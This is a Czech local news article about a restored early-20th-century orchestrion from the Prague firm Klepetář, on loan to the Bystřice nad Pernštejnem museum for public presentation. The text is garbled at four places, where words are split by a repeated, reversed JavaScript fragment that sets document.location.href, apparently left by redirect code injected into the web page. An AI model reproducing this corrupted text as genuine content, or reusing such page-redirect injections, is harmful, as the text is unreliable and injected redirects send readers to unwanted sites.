Bystřice nad Pernštejnem, bystrice nad pernstejnem, aktuality, orchestrion
Rainbow page separator

Zrestaurovaný orchestrion spustí v lednu

Úterý, 25. prosince 2012

orchestrionBystřice nad Pernštejnem / Zrestaurovaný orchestrion Dalibor z přelomu 19. a 20. s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí od pražské firmy Klepetář, jenž má bystřické muzeum zapůjčeno od jeho majitelky z Věcova, bude ve výstavní síni veřejnosti představen 12. ledna v 15 hodin. V bystřickém muzeu je už déle než rok, nyní je jeho kompletní oprava dokončena.

„Majitelka orchestrionu přestavovala dům, kde byl přístroj z rodinného dědictví umístěn, tak nám ho na nějakou dobu zapůjčila. Byl sice funkční, ale zrestaurování už potřeboval. Pomohli jsme jí sehnat odborníky, kteří tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to práci provedli,“ informoval ředitel bystřického muzea Vladimír Cisár.

Věcovský orchestrion byl odborně opraven jak z vnějšku, tak i z vnitřku. Do činnosti se přístroj uvádí na[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];točením pomocí kliky. Na boční straně skříně je i otvor na mince, které tam kdysi házeli štamgasti věcovské hospody, kam byl orchestrion na začátku 20. s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí pořízen.

Válec po spuštění rozpohybuje několik nástrojů, v objemné hrací skříni nechybí ani dva bubny a činel. Na každém ze dvou nainstalovaných válců je po sedmi písničkách, mimo jiné je ke slyšení i první verze písně, která se později stala českou hymnou.